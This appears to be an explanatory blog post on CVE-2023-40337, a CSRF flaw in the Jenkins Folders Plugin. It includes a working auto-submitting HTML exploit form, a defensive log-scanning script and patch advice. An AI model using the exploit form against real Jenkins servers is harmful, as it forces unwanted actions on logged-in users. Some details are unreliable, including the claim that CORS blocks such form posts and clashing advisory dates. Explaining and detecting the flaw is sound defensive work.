CVE-2023-40337 - Exploiting CSRF in Jenkins Folders Plugin to Copy Views Inside Folders

Jenkins is one of the world's most popular automation servers. It's used everywhere from tiny hobby projects to the biggest companies. Because it’s so widely adopted, vulnerabilities in its plugins can have a huge impact. In this post, we’ll dig into CVE-2023-40337—a Cross-Site Request Forgery (CSRF) vulnerability found in the Jenkins Folders Plugin up to version 6.846.v23698686ff6. Using clear language and code samples, we’ll see how this bug works, how an attacker could exploit it, and what you should do to protect yourself.

What is Jenkins Folders Plugin?

Jenkins by default places everything in one big workspace, but big projects or enterprises might want more order. The Folders Plugin brings in the ability to organize jobs into folders, create views inside folders, and much more. It’s a standard plugin in many Jenkins setups.

> Folders Plugin on Jenkins: Wiki

What is CVE-2023-40337 Exactly?

A CSRF (Cross-Site Request Forgery) bug allows attackers to trick a user into performing an unwanted action on a web application they’re authenticated with—usually by tricking them into clicking a malicious link or loading a page.

CVE-2023-40337 affects the Folders Plugin before 6.846.v23698686ff6. This plugin has a view-copying feature—say you want to copy a dashboard view from one folder to another for efficiency. But it turns out the web request used to perform a view copy does not check for a CSRF protection token. This means any external web page can trigger the authenticated user’s browser to copy a view in Jenkins—without their consent.

In Plain Terms

If you’re logged into Jenkins and you visit a malicious site, attackers can silently copy views inside your folders—messing with your workspace, disclosing otherwise-locked-down project information, or sowing confusion.

How Does the Exploit Work?

All an attacker needs to do is craft a web page or even just a form that submits an HTTP POST request to the vulnerable Jenkins endpoint. When a user with the right folder permission loads the attacker’s site, their browser forwards the malicious request *with* their credentials (like session cookies).

Example Exploit Code

Let’s make a simple HTML page that exploits this vulnerability. (Don’t use this on production systems—this is for demonstration and defense.)

Suppose the Jenkins server is at jenkins.example.com. There is a folder called myfolder, and you want to copy a view named build-stats to a new view called copied-view.

<html>
  <body>
    <form id="csrf-exploit" action="http://jenkins.example.com/job/myfolder/view/build-stats/copy" method="POST">
      <input type="hidden" name="name" value="copied-view" />
      <input type="hidden" name="Submit" value="OK" />
    </form>
    <script>
      // Auto-submit the form when the page loads
      document.getElementById('csrf-exploit').submit();
    </script>
    <p>If you see this, the CSRF exploit failed (JavaScript required).</p>
  </body>
</html>

The exploit triggers as soon as the user loads the page!

> Note: Modern browsers may block cross-domain requests (CORS). However, many Jenkins instances are installed on local or corporate networks where access is less restricted.
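On the defensive side, the copy requests described above leave a trace in access logs. The following is an added example (not code from the post or from the Folders Plugin) that scans NCSA combined-format log lines, as a reverse proxy in front of Jenkins would write them, and flags view-copy requests that look cross-site: a copy over GET, or a POST whose Referer is missing or points at a host other than Jenkins. The log lines, host names and endpoint path are constructed to match the scenario in this post; the Referer rule is a heuristic and is only as good as the browser's referrer policy.

```python
import re
from urllib.parse import urlparse

# Constructed sample lines in NCSA combined format (assumed to come from a
# reverse proxy in front of Jenkins); none of these are real log data.
SAMPLE_LOG = """\
10.0.0.5 - alice [16/Aug/2023:15:15:00 +0000] "POST /job/myfolder/view/build-stats/copy HTTP/1.1" 302 0 "http://jenkins.example.com/job/myfolder/view/build-stats/" "Mozilla/5.0"
10.0.0.5 - alice [16/Aug/2023:15:16:10 +0000] "POST /job/myfolder/view/build-stats/copy HTTP/1.1" 302 0 "http://attacker.example/csrf.html" "Mozilla/5.0"
10.0.0.7 - bob [16/Aug/2023:15:17:42 +0000] "GET /job/myfolder/view/build-stats/copy?name=copied-view HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.7 - bob [16/Aug/2023:15:18:00 +0000] "GET /job/myfolder/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The view-copy endpoint used in this post: /job/<folder>/view/<view>/copy
COPY_VIEW_RE = re.compile(r'^/job/[^/]+/view/[^/]+/copy(?:[?/].*)?$')


def is_suspicious_copy(method: str, path: str, referer: str, jenkins_host: str) -> bool:
    """Heuristic: the Jenkins UI submits the copy form with POST from a page on
    Jenkins itself, so a GET, a missing Referer, or a Referer on a foreign host
    is what a cross-site form submission typically looks like."""
    if not COPY_VIEW_RE.match(path):
        return False
    if method != "POST":
        return True
    if referer in ("", "-"):
        return True
    return urlparse(referer).hostname != jenkins_host


def find_suspicious(log_text: str, jenkins_host: str) -> list[dict]:
    """Return one dict per log line that matches the heuristic above."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        d = m.groupdict()
        if is_suspicious_copy(d["method"], d["path"], d["referer"], jenkins_host):
            hits.append({"user": d["user"], "method": d["method"],
                         "path": d["path"], "referer": d["referer"]})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG, "jenkins.example.com"):
        print(hit)
```

Run against the constructed sample, the script reports alice's POST from attacker.example and bob's GET copy, and stays quiet on the legitimate copy that alice made from the Jenkins UI.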

If exploited, this vulnerability can let attackers:

- Copy internal or restricted views. This could expose build logs, secrets, test output, job config, and more.

- Alter folder structure. Confuse or disrupt legitimate users.

- Chain with other permissions. If copied views auto-inherit permissions, information might leak further.

Is There a Fix?

Yes!

- Fixed Version: 6.847.v935a_8d6918e3 of the Folders Plugin introduced proper CSRF protection for the view-copy endpoint.

Jenkins Security Advisory (Sep 06, 2023): https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3204

Official Plugin Site: https://plugins.jenkins.io/cloudbees-folder/

CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2023-40337

- Upgrade Folders Plugin to the latest version.

- Require CSRF Protection: Double-check global security in Jenkins (Manage Jenkins -> Configure Global Security). Ensure "Prevent Cross Site Request Forgery exploits" is enabled.

Summary

CVE-2023-40337 is a classic example of how a small miss in web security (CSRF token missing) can open big doors for an attacker—in this case, letting anyone trick Jenkins into copying views in folders. If you run Jenkins with the Folders Plugin, patch now, and keep your eye on other endpoints that might be lacking CSRF protection! Stay safe and automate smartly.


*This post is exclusive and written in plain language for busy Jenkins admins and devs. Let’s keep our pipelines secure!*

Timeline

Published on: 08/16/2023 15:15:00 UTC
Last modified on: 08/22/2023 18:45:00 UTC